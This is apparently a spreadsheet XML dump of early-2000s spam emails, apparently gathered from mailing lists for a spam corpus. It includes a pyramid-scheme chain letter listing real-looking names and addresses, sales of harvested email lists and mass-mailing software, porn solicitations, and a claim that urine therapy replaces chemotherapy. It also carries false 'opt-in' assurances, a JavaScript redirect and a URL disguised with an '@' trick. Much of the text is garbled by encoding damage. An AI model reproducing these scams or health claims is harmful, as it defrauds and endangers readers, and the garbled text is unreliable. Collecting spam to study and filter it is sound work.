    çš„æœåŠ¡ï¼Œå®¢æˆ·éåŠ20å¤šä¸ªçœå¸‚å’Œåœ°åŒºã€‚    å¦‚æžœæ‚¨ä¸å¸Œæœ›è‡ªå·±è¢«ç”µå­å•†åŠ¡è¿œè¿œçš„ç”©åœ¨åŽé¢ï¼Œè¯·æ‚¨åŠæ—¶çš„è®¿é—®æˆ‘ä»¬çš„ç½‘ç«™
    http://www.chinaemail.net   èŽ·å¾—æœ€æ–°èµ„æ–™ã€‚                                                 å…¨çƒEMAILåœ°å€é”€å”®ç½‘ å¸‚åœºéƒ¨
</t>
  </si>
  <si>
    <t xml:space="preserve">
You've been hand selected to access this exclusive
      work-at-home information for FREE!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</si>
  <si>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Our delightful garden ornaments combine the finest craftsmanship in woodworking with the lastest technology in paints and hardware:http://www.gardenornaments.adv@hellerwhirligigs.com/We are the world's biggest whirligig maker.
Sincerely,Studio T. Inc., USA
The Home of Heller Whirligigs
Remove:E-mail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link:http://www.gardenornaments.adv@hellerwhirligigs.com/remove.htmlEven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...xdreksuhlkuytkyspnjct
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t>A great sponsor will not make you money.
A great product line will not make you money either.
A great compensation plan will not make you money either.
A great company will not make you money either.Some say it's a combination of the above.
Some say it's what's inside you that matters the most.Forget about meetings, one-on-one, 3-ways calls, etc.
Those old ways of network marketing has come and gone.
They wear you out long before you make any money.What makes you money is a downline associated with a
stable company that has consumable products.Where's the downline coming from?  Well, we have an
online automatic recruiting system that does the work
for you.  Our system will place paying members in 
your downline.Furthermore, you can see it working first hand before
you decide what to do, if any.For more info on this simple but powerful recruiting system 
please click here and send a blank message
We belong to the same opt-in list. But if you wish to have your email
address REMOVE from our database please click here</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Take
      Control of Your Computer With This Top-of-the-Line Software!Norton
            SystemWorks 2002  Software Suite            -Professional Edition-
Includes
            Six - Yes 6!
            - Feature-Packed UtilitiesALL for 1
            Special LOW
            Price of Only
            $29.99!
This
            Software Will:Â -
            Protect your computer from unwanted and  hazardous  virusesÂ -
            Help secure your private &amp; valuable informationÂ - Allow
            you to transfer files and send e-mails  safelyÂ -
            Backup your ALL your data quick and easilyÂ - Improve your
            PC's performance w/superior
            integral diagnostics!Â - You'll NEVER have to take your
            PC to the repair shop AGAIN!Â 
6
            Top-of-the-Line  Utilities1
            Great Price  
            A $300+ 
            Combined Retail ValueYOURS  for
            a limited time
            for Only !!!$29.99!!!
&lt; 
            Price Includes FREE Shipping!  &gt;And
            For a Limited time Buy 2 of Our Products &amp; Get 1 Free!
 Don't fall
    prey to destructive viruses or hackers!ProtectÂ  your computer and
    your valuable information and
-&gt;
            CLICK HERE to Order Yours NOW! &lt;-
or Call
      Toll-Free 1-800-861-1481!
Your email
      address was obtained from an opt-in list. Opt-in EAF (Ecommerce Anti-Spam
      Federation) Approved List - Type UPC Prefix = YY*wud02FLUS.Â To
      unsubscribe from this list, please Click
      here . You need to allow 5 Business days for removal. If you have previously unsubscribed and are still receiving
      this message, you may visit our Spam
      Abuse Control Center. We do not condone spam in any shape or form.
      Thank You kindly for your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">
WET, HORNY AND DIRTY GRANDMAS!Remember how you lusted after your friend's mum in high
school? She was 46 and you were 15? Remember the time
when she bent over to do her gardening and you saw her
sagging breasts through the v-neck opening of her summer
dress? She was OLD and you LOVED her! All you wanted to
do was FUK that Dirty Old Mole BLUE! You can now! Follow
the link below to see just how OLD &amp; DIRTY these moles are!
http://62.16.101.30/jump2/index.htmlRemove here:
http://62.16.101.30/jump1/remove.html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</si>
  <si>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
*** Thank you for being a part of another great offer from Quiksilver Enterprises. If you feel you don't belong on our opt-in list please send an email to: Quiksilver@cbulkhost.com and make sure to have "REMOVE" in the subject line. Thank you. Â 
4795Sgyf9-600UjiD5376rfdA5-224brKs3596Alrq4-097nMdy5984RFdb1-998ALzS1480RVgh2-348l76
</t>
  </si>
  <si>
    <t xml:space="preserve">GET FREE ACCESS TO XXX PORN!INSTANT ACCESS... 100% FREE HARDCORENote: If you would would like to be removed from our list, please reply to this email with the word REMOVE as the subjecthxvwnj3q
</t>
  </si>
  <si>
    <t xml:space="preserve">
GREEN CARD
function Go() 
{
window.location="http://www.yesilkart.org/index.php?Who=19";
}
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Freedombuilder Advertising ServicesÂ® can put your product or service instantly 
into the hands of millions of prospects!
Â 
"Many business people are finding out that they can now advertise 
in ways that they never could have afforded in the past.Â  The cost 
of sending mass e-mail is extremely low, and the response rate is 
high and quick." 
- USA TODAY
Â 
" Sanford Wallace says he has made over a Million dollars using bulk email"
- WALL STREET JOURNAL
~~~~~~~~~~~~~~~~~~~~
Â 
Since 1998, Freedombuilder Advertising Services has provided bulk email marketing 
to thousands of well-satisfied customers. We offer the most competitive prices in the 
industry, made possible by our high percentage of repeat business. We have the 
most advanced direct email technology employed by only a knowledgeable few 
in the world.
Â 
We have over 260 million active email addresses, increasing our list at the rate of 
30-50 million per month. You will have instant guaranteed results, something no other 
form of marketing can claim. Our turn around time is a remarkable 24 hours.
Â 
Our email addresses are sorted, cleaned, and filtered for a very profitable 
marketing campaign. 
Â 
We guarantee the lowest prices with a proven track record.
Â 
Best of ALL, Freedombuilder Advertising ServicesÂ® can be used as a 
100% TAX WRITE OFF for your Business!
Â 
Â 1) Let's say you... Sell a $24.95 PRODUCT or SERVICE.
Â 2) Let's say you... Mass Email to 1,000,000 PEOPLE DAILY.
Â 3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.
Â 
Â CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:
Â [Day 1]: $9,980Â  [Week 1]: $69,860Â  [Month 1]: $279,440
Â 
Now you can see how bulk email advertising works, and how 
Freedombuilder Advertising ServicesÂ® can help YOU...!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Our Prices List:
Â 
200,000 emails: $100
1,000,000 emails $300
2,000,000 emails $400
3,000,000 emails $500
4,000,000 emails $600
5,000,000 emails $700
10,000,000 emails $1250
OVER 10 Million - Please inquire
Â 
Prices above are for 100% DELIVERED
Emails, with your message and subject line.
Â 
Please include this information with your order for faster service!
-------------------------------------------------------------------------------------------------------------------
Â 
Name: _______________________________
Address:______________________________
Phone Number:_________________________
E Mail Address:_________________________
"finished, ready to be sent ad", on a 3.5 floppy disk.
Â 
Payable by: US Cash, Certified Cheque, or International Money 
Order to:Freedom Builder Advertising Services
Suite 2058 #3, 9899 112th Avenue
Grande Prairie, AB, Canada
T8V-7T2
-----------------------------------------------------------------------------------------------------------------------
Â 
For order inquiries or extended information please call or email us:
Voice/Fax-253-660-3853 (Limited to 30 secs)
Customer Service (780) 513-2166
Email: freedombuilder@btamail.net.cnBest Regards, And Have A Blessed Day!
Freedombuilder Advertising ServicesÂ®
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Â 
Under Bill s.1618 TITLE III passed by the 105th U.S. Congress this letter 
is not considered "spam" as long as we include: 1) contact information and, 
2) the way to be removed from future mailings.
Â 
If this email has reached you in error or you wish to be removed from our 
mailing list please send your "remove request" to: 432rfe3@eudoramail.com
Â 
We honor all remove requests.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Dear Sir or MadamIn the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
http://www.smokersassociation.co.uk/?S=15&amp;ID=2We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?To remove yourself from our mailing list, please click below
mailto:smokersclub@terra.esYours faithfully.
Smokers Associationhttp://www.smokersassociation.co.uk/?S=15&amp;ID=2xay3171011y
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR OPPORTUNITIES SEEKERS:I THOUGHT YOU JUST MIGHT BE INTERESTED IN THE FOLLOWINGS:WE ARE CURRENTLY HIRING WORK HOME 
TYPIST/CLERK/SECRETARY/SUPERVISOR/TRAINER/MARKETER/MANAGER.WE PAY WEEKLY
1000 USD 
POTENTIAL. NO EXPERIENCE OK. MUST KNOW TYPING. NO SEX,AGE LIMIT. PART/FULL
TIME. ANYWHERE IN 
THE WORLD. APPLY NOW!
EMAIL: responsevivek@indiatimes.com and put I AM INTERESTED in subject
line for details. No spam. Give it a chance.OUR BUSINESS LINKS:OFFSHORE BANKING HIGH INTERESTS ACCOUNT. 300% PER YEAR
AFTER YEAR.WHY
JUST SETTLE FOR 4%? SINCE 1993.MORE INFO . responsevivek@indiatimes.comTAKE ADVANTAGE OF OUR (MALAYSIA)LOW CURRENCIES.BUY
CELLULAR PHONES
CHEAP. BRAND NAME :MOTOROLA,SIEMEN ETC. FROM 50 USD.BRAND
NEW.GUARANTEED WORLD LOWEST.GOOD QUALITY.ALL
MODELS.DETAILS : responsevivek@indiatimes.com. WE ALSO BUY/SELL
SECOND-HAND CELL PHONES. QUALITY GUARANTEED.GUARANTEED WORLD LOWEST PHONE RATES.TRY USE IT YOURSELF
FOR FREE.OR BE AN AGENT FOR THE TOP TEN AND GET YOUR OWN
FREE WEB PAGES AND MAKE BIG $$$.ALL FOR FREE.
PLEASE  CONTACTYOUR OWN PERFECT MEDICINE.THE MIRACLE OF URINE
THERAPY.GOOD-BYE TO
SURGICAL KNIFE,RADIATION,CHEMO ETC.FRIENDS OF UNRINE
THERAPY LIFE-TIME
MEMBERSHIP.FREE CONSULTATION.DR.LIM HENG KIAP,FATHER OF
URINE
THERAPY,MALAYSIA,HEAD OF CHARITABLE NATURAL HEALTH
FARM,FOREST RESERVE
AREA(FRIM ,KUALA LUMPUR ,MALAYSIA)OTHERS INCLUDE
:FASTING,HERBAL,HYDRO-NATURAL HOT, COLD SPRING
SPAS,CRYSTAL,MEDITATION
ETC.INTERESTED PLEASE CONTACT: responsevivek@indiatimes.com
ALL THE ABOVE AGENT/DEALER/REPRESENTATIVE WANTED.TRADE ENQUIRIES WELCOMED. PLEASE EMAIL: responsevivek@indiatimes.com
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">THIS 
        IS A SPECIAL FREE OFFER THAT YOU WILL ONLY GET ONCE!My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100% FREE FOR LIFE
This 
email was sent to you because your email address is part of a targeted opt-in 
list.You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t>
  </si>
  <si>
    <t xml:space="preserve">You have been removed from our list.
You will NOT be able to recieve todays picks in the email
You will NOT be notified of any new sports pick websites.IF YOU HAVE QUESTIONS ABOUT WHY YOUR ACCOUNT IS EXPIRED,
YOUR ACCOUNT WAS CLOSED FOR ONE OF THE FOLLOWING REASONS. 1. YOU FAILED TO LOG INTO YOUR ACCCOUNT FOR OVER A MONTH. 
2. YOUR ACCOUNT WAS FOUND ON A SPAM LIST AND REJECTED. 
3. THE GIFT ACCOUNT SOMEONE SIGNED YOU UP FOR EXPIRED.If you wish to rejoin please go to the following url:
http://www.freewebs.com/registar/YOU DO NOT NEED TO DO ANYTHING TO BE REMOVED FROM THIS eMAIL LIST.
THIS IS A ONE TIME MAILING TO NOTIFY YOU THAT, YOU ARE REMOVED.
However, you may reply with the word "remove" in the subject line
</t>
  </si>
  <si>
    <t>Dear Valued Member,OfferClub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NOTHING.We hope you'll stick around to check out our valuable content, but if
you do not wish to receive our emails please unsubscribe now by
clicking here.
Thank you,OfferClub 
--------------------------------------------------------------------------------
IMPORTANT: If this message was sent to you in error, or if you would
like to unsubscribe please click the link above or cut and paste the
following link into a web browser:
http://www.offerclubmail.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1
--------------------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">Earn Extra Income From Home. Here is tremendous
opportunity to earn big money. We are a multimillion
company that is growing at a rate of 1000% per year.
We are looking for motivated individuals who are
looking to earn a substantial income from home.This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you.http://ter.netblah.com:27000Got nothing to lose and a lot to gain, with a career
that will provide you cast opportunities and
substantial income. Please fill our online information
request form here:http://ter.netblah.com:27000To remove from our list simply click on the link below
now:http://ter.netblah.com:27000/remove.html
  9986dxkU6-303JWSp0699MAYXl24
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Â Â Â The 
              Best Mortage Rates
Â Â Â Â Â Simple, 
              Easy and FREE
Â  
Â 
Â 
Â 
Â 
Â 
Have 
                          HUNDREDS of lenders compete for your loan!
Refinancing 
New Home Loans 
Debt Consolidation 
Second Mortgage 
Home Equity Click Here To
                            JUMP-START
                            your Plans for
                            the Future!!!Dear 
                        Homeowner,
Interest 
                          Rates are at their lowest point in 40 years! We help 
                          you find the best rate for your situation by matching 
                          your needs with hundreds of lenders!Home Improvement, Refinance, 
                            Second Mortgage, Home Equity Loans, and More!                          You're eligible even with less than perfect credit!                          This service is 100% FREE 
                          to home owners and new home buyers without any obligation. 
                                                    Just fill out a quick, simple form and jump-start your 
                          future plans today!Click Here To Begin  Â 
Â 
Â 
Â 
You are receiving this email because you registered 
                        at one of JUNCAN.net's partner sites, and agreed to receive 
                        gifts and special offers that may be of interest to you. 
                        If you do not want to receive special offers in the future, 
                        please click 
                        here.
                      You are subscribed as: webmaster@efi.ie Â 
Â 
Â  
              Equal 
                Housing Opportunity.Â 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Ã¿FFFFA9
Copyright 2002 - All rights reservedIf you would no longer like us
to contact you or feel that you havereceived this email in error,
please click here to
unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Do You Want To Teach and Grow Rich?If you are a motivated and qualified communicator, I will personally train you to do 3  20 minute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annually.Many are called, few are chosen.   Make the call and call the 24 hour pre-recorded message number below.  We will take as much or as little time as you need to see if this program is right for you.                            ***  801-294-3480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801-294-3480  *** 
*To be taken out of this database:
sonic5@artlover.com1139XCyB6-691RCxf9796bQPB2-309RhAl1944TbmA1-318qdJU7208ntpS7-l57
3472UXYd0-277TKyH6354fhOg1-115qsJM1944hyLU8-546fHtS72l50
</t>
  </si>
  <si>
    <t xml:space="preserve">REGISTER DOMAINS FOR JUST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(f4)5241SxzP1-426eVQm2568RURF1-685fOOl31
</t>
  </si>
  <si>
    <t xml:space="preserve">HelloYou may have seen this business before and
ignored it. I know I did - many times! However,
please take a few moments to read this letter.
I was amazed when the profit potential of this
business finally sunk in... and it works!With easy-to-use e-mail tools and opt-in e-mail,
success in this business is now fast, easy and
well within the capabilities of ordinary people
who know little about internet marketing. And the
earnings potential is truly staggering!I'll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value.AS SEEN ON NATIONAL TV:Making over half a million dollars every 4 to 5
months from your home.THANKS TO THE COMPUTER AGE AND THE INTERNET!
==================================================
BE AN INTERNET MILLIONAIRE LIKE OTHERS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mega bucks
with only $25 out of pocket cost".DUE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 PRINT THIS NOW FOR YOUR FUTURE REFERENCE ====
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$If you would like to make at least $500,000 every
4 to 5 months easily and comfortably, please read the
following...THEN READ IT AGAIN and AGAIN!!!$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!INSTRUCTIONS:=====Order all 5 reports shown on the list below =====For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
person whose name appears ON THAT LIST next to the report.
MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
LEFT CORNER in case of any mail problems.===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
===YOU ORDER EACH OF THE 5 REPORTS! ===
You will need all 5 reports so that you can save
them on your computer and resell them.
YOUR TOTAL COST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Take this entire letter, with the modified
list of names, and save it on your computer.
DO NOT MAKE ANY OTHER CHANGES.Save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2.Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to
that is 1000 orders for Report # 3.Those 1000 people send 5,000 e-mails each for a
total of 5 million e-mails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+ 3.....$5,000 + 4..... $50,000
+ 5.... $500,000 .... Grand Total=$555,550.00NUMBERS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
e-mails each or more?There are over 150 million people on the internet
worldwide and counting, with thousands more coming
online every day. Believe me, many people will do
just that, and more!METHOD # 2: BY PLACING FREE ADS ON THE INTERNET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orders.This will guarantee that the e-mail they send out,
with your name and address on it, will be prompt
because they cannot advertise until they receive
the report.===========AVAILABLE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
REPORT # 1: "The Insider's Guide To Advertising
for Free On The Net"
Order Report #1 from:Robert Borowczyk
ul. J. Olbrachta 118C m. 28
01-373 Warsaw
Poland______________________________________________________REPORT # 2: "The Insider's Guide To Sending Bulk
Email On The Net"
Order Report # 2 from: Mohammad Faraziyan
Engelbertstr. 25 
40233 DÃ¼sseldorf
Germany
______________________________________________________REPORT # 3: "Secret To Multilevel Marketing On The Net"
Order Report # 3 from:Luis Pastor
Apartado 81
48080
Bilbao
Spain
______________________________________________________REPORT # 4: "How To Become A Millionaire Using
MLM &amp; The Net"
Order Report # 4 from: 
Ali Reza
Auf den Holln 68
44894 Bochum
Germany
______________________________________________________REPORT # 5: "How To Send Out One Million Emails
For Free"
Order Report # 5 From:J.siden
krondikesvÃ¤gen 54 A
83147 Ã–stersund
Sweden
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do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internet."Fred Dellaca, Westport, New Zealand
=================================================ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
ROAD TO FINANCIAL FREEDOM !=================================================
If you have any questions of the legality of this
program, contact the Office of Associate Director
for Marketing Practices, Federal Trade Commission,
Bureau of Consumer Protection, Washington, D.C.This message is sent in compliance of the proposed
bill SECTION 301, paragraph (a)(2)(C) of S. 1618. * This message is not intended for residents in the
State of Washington, Virginia or California,
screening of addresses has been done to the best
of our technical ability.*  This is a one time mailing and this list will
never be used again.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">HelloYou may have seen this business before and
ignored it. I know I did - many times! However,
please take a few moments to read this letter.
I was amazed when the profit potential of this
business finally sunk in... and it works!With easy-to-use e-mail tools and opt-in e-mail,
success in this business is now fast, easy and
well within the capabilities of ordinary people
who know little about internet marketing. And the
earnings potential is truly staggering!I'll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value.AS SEEN ON NATIONAL TV:Making over half a million dollars every 4 to 5
months from your home.THANKS TO THE COMPUTER AGE AND THE INTERNET!
==================================================
BE AN INTERNET MILLIONAIRE LIKE OTHERS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mega bucks
with only $25 out of pocket cost".DUE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 PRINT THIS NOW FOR YOUR FUTURE REFERENCE ====
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$If you would like to make at least $500,000 every
4 to 5 months easily and comfortably, please read the
following...THEN READ IT AGAIN and AGAIN!!!$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$FOLLOW THE SIMPLE INSTRUCTION BELOW AND 
YOUR FINANCIAL DREAMS WILL COME TRUE, GUARANTEED!INSTRUCTIONS:=====Order all 5 reports shown on the list below =====For each report, send $5 CASH, THE NAME &amp; NUMBER OF THE
REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS to the
person whose name appears ON THAT LIST next to the report.
MAKE SURE YOUR RETURN ADDRESS IS ON  YOUR ENVELOPE TOP
LEFT CORNER in case of any mail problems.===WHEN YOU PLACE YOUR ORDER, MAKE SURE ===
===YOU ORDER EACH OF THE 5 REPORTS! ===
You will need all 5 reports so that you can save
them on your computer and resell them.
YOUR TOTAL COST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Take this entire letter, with the modified
list of names, and save it on your computer.
DO NOT MAKE ANY OTHER CHANGES.Save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2.Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to
that is 1000 orders for Report # 3.Those 1000 people send 5,000 e-mails each for a
total of 5 million e-mails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+ 3.....$5,000 + 4..... $50,000
+ 5.... $500,000 .... Grand Total=$555,550.00NUMBERS DO NOT LIE. GET A PENCIL &amp; PAPER AND
FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL
MAKE A LOT OF MONEY!
==================================================REMEMBER FRIEND, THIS IS ASSUMING ONLY 10 PEOPLE
ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think
for a moment what would happen if everyone or half
or even one 4th of those people mailed 100,000
e-mails each or more?There are over 150 million people on the internet
worldwide and counting, with thousands more coming
online every day. Believe me, many people will do
just that, and more!METHOD # 2: BY PLACING FREE ADS ON THE INTERNET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orders.This will guarantee that the e-mail they send out,
with your name and address on it, will be prompt
because they cannot advertise until they receive
the report.===========AVAILABLE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
REPORT # 1: "The Insider's Guide To Advertising
for Free On The Net"
Order Report #1 from:Robert Borowczyk
ul. J. Olbrachta 118C m. 28
01-373 Warsaw
Poland______________________________________________________REPORT # 2: "The Insider's Guide To Sending Bulk
Email On The Net"
Order Report # 2 from: Mohammad Faraziyan
Engelbertstr. 25 
40233 DÃ¼sseldorf
Germany
______________________________________________________REPORT # 3: "Secret To Multilevel Marketing On The Net"
Order Report # 3 from:Luis Pastor
Apartado 81
48080
Bilbao
Spain
______________________________________________________REPORT # 4: "How To Become A Millionaire Using
MLM &amp; The Net"
Order Report # 4 from: 
Ali Reza
Auf den Holln 68
44894 Bochum
Germany
______________________________________________________REPORT # 5: "How To Send Out One Million Emails
For Free"
Order Report # 5 From:J.siden
krondikesvÃ¤gen 54 A
83147 Ã–stersund
Sweden
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do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internet."Fred Dellaca, Westport, New Zealand
=================================================ORDER YOUR REPORTS TODAY AND GET STARTED ON YOUR
ROAD TO FINANCIAL FREEDOM !=================================================
If you have any questions of the legality of this
program, contact the Office of Associate Director
for Marketing Practices, Federal Trade Commission,
Bureau of Consumer Protection, Washington, D.C.This message is sent in compliance of the proposed
bill SECTION 301, paragraph (a)(2)(C) of S. 1618. * This message is not intended for residents in the
State of Washington, Virginia or California,
screening of addresses has been done to the best
of our technical ability.*  This is a one time mailing and this list will
never be used again.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Â Â Â The 
              Best Mortage  Rates
Â Â Â Â Â Simple, 
              Easy and FREE
Â  
Â 
Â 
Â 
Â 
Â 
Have 
                          HUNDREDS of lenders compete for your loan!
Refinancing 
New Home Loans 
Debt Consolidation 
Second Mortgage 
Home Equity Click Here To
                            JUMP-START
                            your Plans for
                            the Future!!!Dear 
                        Homeowner,
Interest 
                          Rates are at their lowest point in 40 years! We help 
                          you find the best rate for your situation by matching 
                          your needs with hundreds of lenders!Home Improvement, Refinance, 
                            Second Mortgage, Home Equity Loans, and More!                          You're eligible even with less than perfect credit!                          This service is 100% FREE 
                          to home owners and new home buyers without any obligation. 
                                                    Just fill out a quick, simple form and jump-start your 
                          future plans today!Click Here To Begin  Â 
Â 
Â 
Â 
You are receiving this email because you registered 
                        at one of JUNCAN.net's partner sites, and agreed to receive 
                        gifts and special offers that may be of interest to you. 
                        If you do not want to receive special offers in the future, 
                        please click 
                        here.
                      You are subscribed as: webmaster@efi.ie Â 
Â 
Â  
              Equal 
                Housing Opportunity.Â 
Â 
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi i'm Rita !!!
READ
MY
LIPStick
 !LIVE
From
Amsterdam
!Â 
Â 
Â 
Â 
Â 
This mail is NEVER sent unsolicited, Got it by 
error ?[ CLICK HERE ] to be removed from our 
subscribers List !fuclcxlequtkbfuoeseysgfu
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Sitescooper-talk mailing list
Sitescooper-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sitescooper-talk
</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</si>
  <si>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now.Click_Herehttp://n62.go2net.com/adclick?cid=180713&amp;site=dp&amp;cp=nbci&amp;clickurl=http://211.167.74.101/mortg/
Sincerely,Chalres M. Gillette
MortCorp, LLCrpmmumwnzvrmtuqepbremaddardmkkksfpipttmsdocbmnbkghfqauxdoitvxdmvdazpibikzbfxporvaazcuttzzzzjxuitoysdfbyominmypxtuomobktfgqg__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,I'm a college dropout.  I work about two hours a day.  
I'm ambitious, but extremely lazy, and I make over 
$250,000 a year.  Are you curious yet?In a minute I'm going to tell you my secret,
it's the dirty little secret of the Internet ...You've probably heard stories about people making
whopping huge money online, but you thought they 
were the big corporate execs, famous programmers, or
boy-geniuses.Well, grasshopper, think again ...It's people like you and me that are making the real
money.  Yep, people like YOU AND ME!Ever since the "dot com bubble" burst in 1999, small-time
entrepreneurs are getting richer while the Fortune 500 
companies look for bankruptcy lawyers.Today small business owners and ordinary folks 
like you and me can use the web to achieve complete 
financial freedom with NO INVESTMENT and very little 
work.  How?  By learning the most profitable marketing 
technique ever created - it's called BULK EMAIL.If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ZERO!Stop paying those outrageous auction listing fees when
hardly anyone sees your ad!Imagine that you have a decent product with a 
profit margin of $20.00 on each sale.  If you send 
an email ad to 500,000 people, and only one person 
in a thousand actually places an order, then you just 
generated 500 orders and made $10,000 in a few hours 
of work.  It's that simple ...All you have to do is convince ONE PERSON OUT OF A
THOUSAND to buy your stuff and you're FILTHY RICH.The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for?!I'm going to ask you four simple questions.  If you answer
YES to all of them, then I can almost promise that you
will make at least $100,000 using bulk email this year.Here goes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grind!All you need is ambition and commitment.  This
is no "get rich quick scheme".  You have to work
to make big bucks, but ANYONE - and I mean ANYONE - can do 
it.You're probably wondering if it's hard to get started.  
Don't worry, it's not! I will show you step-by-step 
how to start your first email campaign and how to
build a booming online business.  You'll be generating 
orders - AND MAKING MONEY - in less than seven days.Okay, so what if you don't have anything to sell?No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...I personally guarantee that you will start your own 
bulk email campaign less than a week after reading 
the Bulkbook!  I'll give you a toll-free phone number 
to reach me 24 hours a day, seven days a week; 
where else will you find that level of service?!I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go.As a special bonus, you'll recieve a FREE copy 
of our STEALTH MASS MAILER, a very powerful bulk 
email program which retails for $49.99! I'll even
include 7 million email addresses absolutely FREE
if you order NOW!Stop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THE BULKBOOK
Teaches you step-by-step how to become a high profit
bulk emailer.  Secret techniques and tips never
before revealed.** SEVEN DAYS TO BULK EMAIL SUCCESS
Provides detailed day-by-day instruction to start sending
your first email campaign in seven days.** 600 Email subjects that PULL LIKE CRAZY** EMAIL LIST MANAGER
Manage your email lists quickly and easily.  Very 
user-friendly, yet powerful, software.** STEALTH MASS MAILER
Software can send up to 50,000 emails an hour automatically.
Just load them in there and click SEND!** ADDRESS ROVER 98 and MACROBOT SEARCH ENGINE ROBOT
Extracts email addresses from databases and search engines
at speeds of over 200,000 per hour.** WORLDCAST EMAIL VERIFIER
Used to verify your email addresses that you extract to 
make sure they're valid.** EBOOK PUBLISHER
Easily publish your own e-books and reports for resale using,
you guessed it, bulk email!** SEVEN MILLION EMAIL ADDRESSES
This huge list will get you started bulking right away.
I harvested these addresses myself, the list is filled
with IMPULSE BUYERS ready to respond to your ads!If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effort?Remember, you will recieve a toll-free phone number
for 24 hour expert advice and consultation FROM ME
PERSONALLY.To order the Bulkbook right now for only $29.99 with 
a Visa or Mastercard, please click on the link below. 
This will take you to our secure server for order 
processing:http://cbphost.net/users/quiksilver/bulkbook.htmNote: The Bulkbook will be delivered electronically
within 24 hours. It is not available in printed form. ***********************************************************
Our company is strictly opposed to unsolicited email.
To be removed from this opt-in list, please send a 
request to "quiksilver@cbulkhost.com"
***********************************************************
7870fubX0-764wHdL6646musT3-086uml30
</t>
  </si>
  <si>
    <t xml:space="preserve">
Question?Do you want a different job?
Do you want to be your own boss?
Do you need extra income?
Do you need to start a new life?
Does your current job seem to go nowhere?If you answered yes to these questions, then here is your solution.We are a fortune 500 company looking for motivated individuals who are 
looking
to a substantial income working from home.Thousands of individual are currently do this RIGHT NOW.
So if you are looking to be employed at home, with a career that will
provide you vast opportunities and a substantial income, please fill
out our online information request form here now:http://ter.netblah.com:27000To miss out on this opportunity, click herehttp://ter.netblah.com:27000/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Our delightful garden ornaments combine the finest craftsmanship in woodworking with the lastest technology in paints and hardware:http://www.gardenornaments.adv@hellerwhirligigs.com/We are the world's biggest whirligig maker.
Sincerely,Studio T. Inc., USA
The Home of Heller Whirligigs
Remove:E-mail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link:http://www.gardenornaments.adv@hellerwhirligigs.com/remove.htmlEven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...sgossqweylpfdxongtxllytjnmkamyrwrascyl
</t>
  </si>
  <si>
    <t xml:space="preserve">
Never Pay Retail!
Direct Synergy - Household Creative Sep 02
Our 
            application process is quick and easy - And, you'll receive a response 
            back in moments.             No lender's fees means you could save $100's maybe even $1,000's. 
            Compare for yourself and see the difference a Household loan can make. 
Origination 
                  Fee* 
